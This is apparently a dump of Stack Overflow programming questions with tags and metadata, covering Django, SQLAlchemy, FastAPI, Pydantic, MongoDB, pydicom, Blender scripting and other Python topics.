<p>I am using django, django-ninja framework to replace some of my apis ( written in drf, as it is becoming more like a boilerplate codebase ). Now while transforming some legacy api, I need to follow the old structure, so the client side doesn't face any issue. This is just the backstory.</p> <p>I have two separate models.</p> <pre class="lang-py prettyprint-override"><code>class Author(models.Model): username = models.CharField(...) email = models.CharField(...) ... # Other fields class Blog(models.Model): title = models.CharField(...) text = models.CharField(...) tags = models.CharField(...) author = models.ForeignKey(...) ... # Other fields </code></pre> <p>The structure written in django rest framework serializer</p> <pre><code>class BlogBaseSerializer(serializers.Serializer): class Meta: model = Blog exclude = [&quot;author&quot;] class AuthorSerializer(serializers.Serializer): class Meta: model = Author fields = &quot;__all__&quot; class BlogSerializer(serializers.Serializer): blog = BlogBaseSerializer(source=&quot;*&quot;) author = AuthorSerializer() </code></pre> <p>In viewset the following queryset will be passed</p> <pre><code>class BlogViewSet(viewsets.GenericViewSet, ListViewMixin): queryset = Blog.objects.all() serializer_class = BlogSerializer ... # Other config </code></pre> <p>So, as I am switching to django-ninja which uses pydantic for schema generation. I have the following code for pydantic schema</p> <pre><code>AuthorSchema = create_schema(Author, exclude=[&quot;updated&quot;, &quot;date_joined&quot;]) class BlogBaseSchema(ModelSchema): class Meta: model = Blog exclude = [&quot;author&quot;, ] class BlogSchema(Schema): blog: BlogBaseSchema author: AuthorSchema </code></pre> <p>But as you can see, drf serializer has a parameter called <code>source</code>, where <code>source=&quot;*&quot;</code> means to pass the entire original dataset to the nested field serializer. Is there any option to do the exact same with pydantic?</p> <p>Except for creating a list of dictionaries [{author: blog.author, &quot;blog&quot;: blog} for blog in queryset]</p>
<python><django><django-rest-framework><pydantic><django-ninja>
2024-01-12 17:09:08
1
691
Khan Asfi Reza
77,808,185
7,675,202
Importing locally created package in python installed from Pipfile not detected
<p>I created a package folder parallel to my apps folder, where my packages folder will have shared/reusable code that'll be used across different apps and probably published, but before then i need to test it and use it locally.</p> <p>This is my Pipfile for my mobile folder:</p> <pre><code>[packages] pronto_auth = {editable = true, path = &quot;../../packages/auth&quot;} pronto_apis = {editable = true, path = &quot;../../packages/apis&quot;} flet = &quot;*&quot; </code></pre> <p>Not sure why by my lock file looks like this when i've imported with &quot;_&quot; and not &quot;-&quot;</p> <pre><code>&quot;pronto-apis&quot;: { &quot;editable&quot;: true, &quot;path&quot;: &quot;../../packages/apis&quot; }, &quot;pronto-auth&quot;: { &quot;editable&quot;: true, &quot;path&quot;: &quot;../../packages/auth&quot; }, </code></pre> <p>Yes, it does install sucessfully.</p> <p>the pronto_auth and apis folder get installed by i can't seem to import it. I get the following error:</p> <p><code>Import &quot;pronto_apis.apis.main.src.main&quot; could not be resolved</code></p> <p>This is how I'm trying to import:</p> <p><code>from pronto_apis.apis.main.src.main import add_two_numbers</code></p> <p>I don't wnat to import like this:</p> <p><code>from packages.apis.main.src.main import add_two_numbers</code></p> <p>because the defeats the purpose of a package like import.</p> <p>This is my folder structure and import looks like:</p> <p><a href="https://i.sstatic.net/561Zz.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/561Zz.png" alt="enter image description here" /></a></p> <p>my setup file for both the api and auth looks like this:</p> <pre><code>from setuptools import setup, find_packages setup( name='pronto_apis', version='0.0.1', packages=find_packages(), description='A brief description of your package', install_requires=[], ) </code></pre>
<python>
2024-01-12 17:02:42
1
4,345
Mohamed Mohamed
77,807,760
10,816,965
Avoid SQL injection when creating user with SQLAlchemy Core
<p>When creating a user with <code>psycopg</code>, I would create the following composite in order to avoid SQL injection:</p> <pre><code>from psycopg.sql import SQL, Identifier, Literal username = &quot;test_user&quot; password = &quot;test_password&quot; query = SQL( &quot;CREATE USER {username} WITH ENCRYPTED PASSWORD {password};&quot; ).format(username=Identifier(username), password=Literal(password)) </code></pre> <p>This can be tested in the scope of a <code>psycopg.Connection</code>:</p> <pre><code>print(query.as_string(connection)) # CREATE USER &quot;test_user&quot; WITH ENCRYPTED PASSWORD 'test_password'; </code></pre> <p>What is the recommended way to do the same with <code>sqlalchemy</code>? I tried <code>quoted_name</code> and <code>bind_params</code>, but the former was not successful:</p> <pre><code>from sqlalchemy import quoted_name, text query = text( f&quot;CREATE USER {quoted_name(username, True)} WITH ENCRYPTED PASSWORD :password;&quot; ).bindparams(password=password).compile(compile_kwargs={&quot;literal_binds&quot;: True}) print(query) # CREATE USER test_user WITH ENCRYPTED PASSWORD 'test_password'; </code></pre> <p>(Changing the second parameter of <code>quoted_name</code> to <code>False</code> or <code>None</code> yields the same result.)</p>
<python><postgresql><sqlalchemy><psycopg3>
2024-01-12 15:51:16
0
605
Sebastian Thomas
77,807,681
2,611,159
Getting all values of an "enum" class of ctypes type
<p>I'm struggling to find all values or iterate over all values for an enum class found in an SDK I need to make use of. The enums are not the classical <code>Enum</code> as python comes with but defined as</p> <pre><code>import ctypes import ctypes.utils XSULONG32 = ctypes.c_uint32 class XS_INFO(XSULONG32): XS_CONST0 = 0 XS_CONST1 = 1 XS_CONST2 = 2 </code></pre> <p>I have code where I'd like to access both the constants values found in these classes, and ideally also the constants names left of the equal sign.</p> <p>The intuitive approach of</p> <pre><code>for (name, value) in XS_INFO(): print(&quot;{}: {}&quot;.format(name, value)) </code></pre> <p>results in</p> <pre><code>TypeError: 'XS_INFO' object is not iterable </code></pre> <p>And similar trying other advice, e.g. the advice from <a href="https://stackoverflow.com/questions/29503339/how-to-get-all-values-from-python-enum-class">this question</a>:</p> <pre><code>[hscam.XS_INFO().value for value in hscam.XS_INFO()] TypeError: 'XS_INFO' object is not iterable [hscam.XS_INFO.value for value in hscam.XS_INFO] TypeError: '_ctypes.PyCSimpleType' object is not iterable </code></pre> <p>How can I iterate over all values of such enum?</p>
<python><enums><ctypes>
2024-01-12 15:37:53
1
6,094
planetmaker
77,807,656
5,506,167
Why is it unsafe to use a generic self type in an argument?
<p>The <a href="https://mypy.readthedocs.io/en/stable/generics.html#generic-methods-and-generic-self" rel="nofollow noreferrer">mypy doc says</a>:</p> <blockquote> <p>Note that mypy lets you use generic self types in certain unsafe ways in order to support common idioms. For example, using a generic self type in an argument type is accepted even though it’s unsafe.</p> </blockquote> <p>It then mentions an example of using generic self type in an argument:</p> <pre class="lang-py prettyprint-override"><code>from typing import TypeVar T = TypeVar(&quot;T&quot;) class Base: def compare(self: T, other: T) -&gt; bool: return False class Sub(Base): def __init__(self, x: int) -&gt; None: self.x = x # This is unsafe (see below) but allowed because it's # a common pattern and rarely causes issues in practice. def compare(self, other: Sub) -&gt; bool: return self.x &gt; other.x b: Base = Sub(42) b.compare(Base()) # Runtime error here: 'Base' object has no attribute 'x' </code></pre> <p>I can't understand what's the &quot;unsafe&quot; matter here. The main problem is that the <code>b</code> variable is assigned a type that is not precise (b:Base)</p> <p>So what is the point in the doc?</p> <p>P.S: The point of &quot;unsafe&quot; in the doc is that it type checks well but will produce an exception in runtime. But what I can't understand is that why this is related to the annotation of <code>other: T</code> in <code>Base.compare</code>. I think It's due to the imprecise type of b that should have been cast to Sub by the developer.</p> <p>In other words: What should I do in case I have a method that accepts the same object type as self as its other arguments?</p>
<python><python-typing><mypy>
2024-01-12 15:33:02
1
1,962
Saleh
77,807,611
1,714,692
Proper index creation in mongodb timeseries collection
<p>I am trying to create indexes for a nested mongo db timeseries collection. My mongo db version, obtained by running <code>mongod --version</code>, is v3.6.8.</p> <p>The timeseries schema follows the <a href="https://www.mongodb.com/docs/manual/core/timeseries-collections/" rel="nofollow noreferrer">suggested one</a>.</p> <p>My collection has a schema like:</p> <pre><code>validator = { &quot;$jsonSchema&quot;: { &quot;bsonType&quot;: &quot;object&quot;, &quot;required&quot;: [&quot;timestamp&quot;, &quot;metadata&quot;, &quot;measurements&quot;], &quot;properties&quot;: { &quot;timestamp&quot;: { &quot;bsonType&quot;: &quot;long&quot;, }, &quot;metadata&quot;: { &quot;bsonType&quot;: &quot;object&quot;, &quot;required&quot;: [&quot;type&quot;, &quot;sensor_id&quot;], &quot;properties&quot;: { &quot;type&quot;: { &quot;bsonType&quot;: &quot;string&quot;, &quot;description&quot;: &quot;Measurement type&quot; }, &quot;sensor_id&quot;: { &quot;bsonType&quot;: &quot;string&quot;, &quot;description&quot;: &quot;sensor id&quot; } } }, &quot;measurement&quot;: { &quot;bsonType&quot;: &quot;array&quot;, &quot;description&quot;: &quot;must be an array and is required&quot;, &quot;items&quot;: { &quot;bsonType&quot;: &quot;double&quot;, &quot;description&quot;: &quot;must be array of float and is required&quot; }, &quot;minItems&quot;: 3, &quot;maxItems&quot;: 3, }, } } } </code></pre> <p>When using Mongo db compass to access the db, going to the <code>Index</code> page shows in red the message: <code>Unrecognized expression '$toDouble()'</code>: <a href="https://i.sstatic.net/QYKdN.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/QYKdN.png" alt="Error on MongoDb Compass" /></a></p> <p>I thought this happens because I have not defined any Index yet. So in Pymongo, I try to create Indexes of the nested fields <code>type</code> and <code>sensor_id</code> with the line:</p> <pre><code>mydb.mycollection.create_index( [ (&quot;attrs.nested.sensor_id&quot;, pymongo.ASCENDING), (&quot;attrs.nested.type&quot;, pymongo.ASCENDING) ]) </code></pre> <p>But the message error in Mongo Db compass keeps showing the error:</p> <ol> <li>how to solve this Mongodb compass error</li> </ol> <p>Furthermore, I am not sure the indexes are correctly defined, because if I create a fake index like:</p> <pre><code>mydb.mycollection.create_index( [ (&quot;attrs.nested.unexisting_field&quot;, pymongo.ASCENDING), ]) </code></pre> <p>no error is generated although the specified field does not exist: 2) is there a way to check the index is correctly</p>
<python><mongodb><indexing><pymongo><mongodb-compass>
2024-01-12 15:24:34
1
9,606
roschach
77,807,349
6,494,707
macro accuracy in scikit learn
<p>I am trying to calculate <code>macro accuracy</code>.</p> <p>if I set</p> <pre><code>from sklearn.metrics import precision_recall_fscore_support y_true=[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2] y_pred=[2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 2, 2, 2, 2] print(precision_recall_fscore_support(y_true, y_pred,average='macro')) Output: (0.5, 0.4722222222222222, 0.4857142857142857, None) </code></pre> <p>will the output <code>recall</code> be equivalent to macro accuracy?</p> <p>How to calculate maco accuracy by scikitlearn metrics?</p>
<python><scikit-learn>
2024-01-12 14:42:15
1
2,236
S.EB
77,807,142
13,520,498
AttributeError: Calling operator "bpy.ops.import_scene.obj" error, could not be found
<p>I am trying to write a python script that will convert triangular-mesh objects to quad-mesh objects.</p> <p><a href="https://i.sstatic.net/mNB4W.png" rel="noreferrer"><img src="https://i.sstatic.net/mNB4W.png" alt="enter image description here" /></a></p> <p>For example, image (a) will be my input (<code>.obj/.stl</code>) file and image (b) will be the output.</p> <p>I am a noob with mesh-algorithms or how they work all together. So, far this is the script I have written:</p> <pre><code>import bpy inp = 'mushroom-shelve-1-merged.obj' # Load the triangle mesh OBJ file bpy.ops.import_scene.obj(filepath=inp, use_smooth_groups=False, use_image_search=False) # Get the imported mesh obj = bpy.context.selected_objects[0] # Convert triangles to quads # The `beauty` parameter can be set to False if desired bpy.ops.object.mode_set(mode='EDIT') bpy.ops.mesh.select_all(action='SELECT') bpy.ops.mesh.tris_convert_to_quads(beauty=True) bpy.ops.object.mode_set(mode='OBJECT') # Export to OBJ with quads bpy.ops.export_scene.obj(filepath='quad_mesh.obj') </code></pre> <p>This results in the following error:</p> <pre><code>Traceback (most recent call last): File &quot;/home/arrafi/mesh-convert-application/test.py&quot;, line 8, in &lt;module&gt; bpy.ops.import_scene.obj(filepath=inp, File &quot;/home/arrafi/mesh-convert-application/venv/lib/python3.10/site-packages/bpy/4.0/scripts/modules/bpy/ops.py&quot;, line 109, in __call__ ret = _op_call(self.idname_py(), kw) AttributeError: Calling operator &quot;bpy.ops.import_scene.obj&quot; error, could not be found </code></pre> <p>Any help with what I am doing wrong here would be greatly appreciated.</p> <ul> <li>Also please provide your suggestions for if you know any better way to convert triangular-mesh to quad-mesh with Python.</li> <li>If you guys know of any API that I can call with python to do the conversion, that would work too.</li> </ul>
<python><python-3.x><blender><stl-format><bpy>
2024-01-12 14:06:50
2
1,991
Musabbir Arrafi
77,807,054
5,764,661
FastAPI exception_handlers and mounted apps
<p>I have a FastAPI app :</p> <pre class="lang-py prettyprint-override"><code>app = FastAPI() </code></pre> <p>And several mounted apps.</p> <pre class="lang-py prettyprint-override"><code>app.mount(&quot;app_1&quot;, mounted_app_1) app.mount(&quot;app_2&quot;, mounted_app_1) # and so on </code></pre> <p>I defined an exception handler so that a certain class of errors are handled specifically</p> <pre class="lang-py prettyprint-override"><code>@app.exception_handler(ValidationError) async def request_validation_error_exception_handler( request: Request, exc: ValidationError ): return JSONResponse( status_code=422, content={&quot;message&quot;: &quot;validation error&quot;}, ) </code></pre> <p>But it does not seem to cascade on my mounted apps. I would like to avoid defining an exception handler on each of the mounted class. Is there a way to cascade this exception handler ?</p>
<python><exception><fastapi>
2024-01-12 13:49:06
0
301
William Pollet
77,806,959
1,652,219
How to run multiple dependent sql statements in sqlalchemy?
<h2>Problem</h2> <p>I have a bunch of dependent SQL statements that I would like to run in the same context in sqlalchemy, but I cannot make it work.</p> <h2>Running All at Once</h2> <pre><code>values = ', '.join(f&quot;('{id}')&quot; for id in obligor_ids) q = f&quot;&quot;&quot; USE {database}; DECLARE @ObligorIDs AS {schema}.ObligorIDListType; INSERT INTO @ObligorIDs (ID) VALUES {values}; SELECT * FROM {schema}.GetLUsByObligorID(@ObligorIDs); &quot;&quot;&quot; engine.execute(q) </code></pre> <p>Failes with error message &quot;This result object does not return rows. It has been closed automatically&quot; because multiple batches cannot be run in one query. I have also tried wrapping the string in &quot;text&quot; as suggested multiple places, but with the same result. When I run the EXACT same query in SQL Management Studio it works like a charm.</p> <h2>Running batches one-by-one in a Session</h2> <pre><code># Switching to sql function database q1 = f&quot;USE {database};&quot; # Declaring input q2 = f&quot;DECLARE @ObligorIDs AS {schema}.ObligorIDListType;&quot; q3 = f&quot;INSERT INTO @ObligorIDs (ID) VALUES {values};&quot; # Declaring output q4 = f&quot;SELECT * FROM {schema}.GetLUsByObligorID(@ObligorIDs);&quot; # Running sql function with Session(engine) as session: session.execute(q1) session.execute(q2) session.execute(q3) result = session.execute(q4).fetchall() session.commit() </code></pre> <p>This fails because session.execute(q4) cannot access @ObligorIDs.</p>
<python><sql><sql-server><sqlalchemy><subquery>
2024-01-12 13:34:32
1
3,944
Esben Eickhardt
77,806,881
1,279,000
How do I update multiple rows when applying a left join on a model query?
<p>In this little card scanning app demo I'm making while learning SQLAlchemy, I'm attempting to make any card(s) assigned to a user inactive after the user is made inactive. I'm struggling to write a query that will update the access card status value with a left join in the mix. Here's what I have now:</p> <pre><code># if user does not have active status, update any assigned card(s) status to inactive if user.status != UserStatusEnum.ACTIVE: db.session.query(AccessCard) \ .join( UserAccessCard, UserAccessCard.access_card_id == AccessCard.id, isouter=True ) \ .update(status=AccessCardStatusEnum.INACTIVE) \ .where(UserAccessCard.assigned_to_user_id == user.id) </code></pre> <p>Error:</p> <pre><code>TypeError: Query.update() got an unexpected keyword argument 'status' </code></pre> <p>This is specific to <code>AccessCard.status</code>. When entering that:</p> <pre><code>... .update(AccessCard.status=AccessCardStatusEnum.INACTIVE) ... </code></pre> <p>I get a new error:</p> <pre><code> .update(AccessCard.status=AccessCardStatusEnum.INACTIVE) \ ^^^^^^^^^^^^^^^^^^ SyntaxError: expression cannot contain assignment, perhaps you meant &quot;==&quot;? </code></pre> <p>I feel like I'm super close. The join is tripping me up though. I can see querying the cards, then updating individually in a loop as one option. Yet, that seems like more steps than needed.</p> <p>How should I make this joined update query happen?</p>
<python><sqlalchemy><flask-sqlalchemy>
2024-01-12 13:23:41
1
1,278
Christopher Stevens
77,806,839
2,168,548
pydicom.dcmread() consumes a lot of memory when working with bigger files
<p>Is there a way where we can read the dicom file using buffer?</p> <p>I tried defer_size = '50 MB' , but when i accessed pixel data, all the pixel data was read and stored in memory</p> <p>Can I do something like:</p> <pre><code>def buffered_dcmread(file_path, buffer_size=4096): with open(file_path, 'rb') as file: buffer = file.read(buffer_size) while buffer: dataset = pydicom.dcmread(buffer, stop_before_pixels=True file.seek(dataset.end_tell) buffer = file.read(buffer_size) dicom_file_path = 'dicom_file.dcm' buffered_dcmread(dicom_file_path) </code></pre> <p>I am working with multi-frame files and I need to convert each frame to a jpeg</p> <p>How do I do that without loading all the pixel data into the memory?</p>
<python><pydicom>
2024-01-12 13:15:31
1
359
ShoibAhamed
77,806,829
2,989,777
How can I write a JMESPath expression to select a keys containing brackets ("({")?
<p>Given the dictionary</p> <pre class="lang-py prettyprint-override"><code>product_data = { 'restrictions({&quot;basketItems&quot;:[],&quot;endDateTime&quot;:&quot;&quot;,&quot;startDateTime&quot;:&quot;&quot;})': [ { '__typename': 'ProductRestrictionType', 'type': 'RdgDateRange', 'isViolated': False, 'message': 'Price Cuts - Was £0.50\n' }, { '__typename': 'ProductRestrictionType', 'type': 'ExcludedProduct', 'isViolated': True, 'message': 'This product is unavailable' } ] } </code></pre> <p>I wanted to select the following key</p> <pre class="lang-none prettyprint-override"><code>restrictions({&quot;basketItems&quot;:[],&quot;endDateTime&quot;:&quot;&quot;,&quot;startDateTime&quot;:&quot;&quot;}) </code></pre> <p>I tried the following but I am getting an error due to brackets:</p> <pre class="lang-py prettyprint-override"><code>import jmespath expression = jmespath.compile('restrictions({&quot;basketItems&quot;:],&quot;endDateTime&quot;:&quot;&quot;,&quot;startDateTime&quot;:&quot;&quot;})') result = expression.search(product_data) </code></pre> <p>How can I fix this expression JMESPath?</p>
<python><json><jmespath>
2024-01-12 13:13:50
1
1,185
yasirnazir
77,806,798
13,180,560
Unable to bypass CORS in my Flask and React app
<p>I am getting CORS error most of the time even if i give access to all origins its giving the same issue</p> <p><a href="https://i.sstatic.net/TWSUi.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/TWSUi.png" alt="CORS ERROR" /></a></p> <p>Here is my code in Flask</p> <p><a href="https://i.sstatic.net/IWRSP.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/IWRSP.png" alt="enter image description here" /></a></p> <pre><code>if __name__ == '__main__': # app.run(port=5000) socketio.run(app, debug=True) </code></pre> <p>your help would be appreciated.</p>
<python><reactjs><flask><socket.io><flask-socketio>
2024-01-12 13:08:52
1
1,416
Amir Doreh
77,806,675
11,829,002
Compute a linear regression, not for all data points
<p>I'm plotting errors obtained for various mesh sizes to study the order of convergence of the model. As shown in the two plots below the &quot;good regime&quot; is not always present, either because the mesh is too coarse (Fig. 1) or either we reach floating point precision (Fig. 2).</p> <p><a href="https://i.sstatic.net/9q3ur.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/9q3ur.png" alt="Fig. 1" /></a> <a href="https://i.sstatic.net/cp8oE.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/cp8oE.png" alt="Fig. 2" /></a></p> <p>So computing the linear regression on the whole data would not yield correct results. One solution would be to manually remove the undesired points and then compute the linear regression (with <code>sklearn.linear_model</code> for instance) but as I have about 144 data frames to deal with, it will take a lot of time!</p> <p>I did not find such a feature in <code>sklearn.linear_model</code>. Does it exist? Or is there a module that does it?</p> <p>I also imagined a workaround consisting of computing all the slopes for consecutive points, and keeping for the actual linear regression all the values that are « the most frequent » but I did not manage to implement this.</p> <p>On the two figures, I underlined the points I'd like to keep for the linear regression in red.</p> <p>Here is the code I used to get the plot:</p> <pre class="lang-py prettyprint-override"><code>import plotly.graph_objects as go from io import StringIO import pandas as pd import numpy as np from sklearn.linear_model import LinearRegression import plotly.express as px df = pd.read_csv(StringIO(&quot;&quot;&quot;hsize,errorl2 0.1,0.0126488001839 0.05,0.0130209787153 0.025,0.0111789092046 0.0125,0.00766945668181 0.00625,0.0012502455118 0.003125,0.000268314690697 &quot;&quot;&quot;)) def linear_regression_log(x, y): # Compute the linear regression for log-log data, but here all the points are used in the computation keep = ~np.isnan(y) # in my case, some data are missing log_x = np.log(np.array(x[keep])) log_y = np.log(np.array(y[keep])) model = LinearRegression() model.fit(log_x.reshape(-1, 1), log_y) slope = model.coef_[0] intercept = model.intercept_ return slope, intercept # Sample data x = df['hsize'] y = df['errorl2'] a, _ = linear_regression_log(x, y) fig = go.Figure() fig.add_trace(go.Scatter(x=x, y=y, mode='markers+lines')) fig.update_layout(title=f&quot;Slope: {a:.2f}&quot;) fig.update_xaxes(type=&quot;log&quot;) fig.update_yaxes(type=&quot;log&quot;) fig.show() </code></pre> <p>And the data I plotted:</p> <ul> <li>Fig. 1:</li> </ul> <pre><code>hsize,errorl2 0.1,0.0126488001839 0.05,0.0130209787153 0.025,0.0111789092046 0.0125,0.00766945668181 0.00625,0.0012502455118 0.003125,0.000268314690697 </code></pre> <ul> <li>Fig. 2:</li> </ul> <pre><code>hsize,errorl2 0.1,0.000713407986653 0.05,1.60793872143e-06 0.025,6.20078712336e-11 0.0125,2.99238475669e-13 0.00625,1.1731644955e-13 0.003125,1.88186766825e-13 </code></pre>
<python><scikit-learn><linear-regression>
2024-01-12 12:47:42
1
398
Thomas
77,806,510
14,720,380
Can I use Pydantic to deserialize a Union type, without creating another basemodel?
<p>I want to deserialize some data into a union type like so:</p> <pre class="lang-py prettyprint-override"><code>from pydantic import BaseModel, Field from typing import Annotated, Union, Literal class Foo(BaseModel): type: Literal[&quot;foo&quot;] = &quot;foo&quot; x: int class Bar(BaseModel): type: Literal[&quot;bar&quot;] = &quot;bar&quot; x: float Baz = Annotated[Union[Foo, Bar], Field(discriminator=&quot;type&quot;)] d = { &quot;type&quot;: &quot;bar&quot;, &quot;x&quot;: 10.1 } # Deserialize Baz here </code></pre> <p>This could be done by making another base model and deserializing it there, but I was wondering if there was a way to use a function within Pydantic to do it without this?</p> <pre class="lang-py prettyprint-override"><code>class Config(BaseModel): baz: Baz model = Config.model_validate({&quot;baz&quot;: d}) print(model) # Outputs: baz=Bar(type='bar', x=10.1) </code></pre>
<python><pydantic><pydantic-v2>
2024-01-12 12:19:21
1
6,623
Tom McLean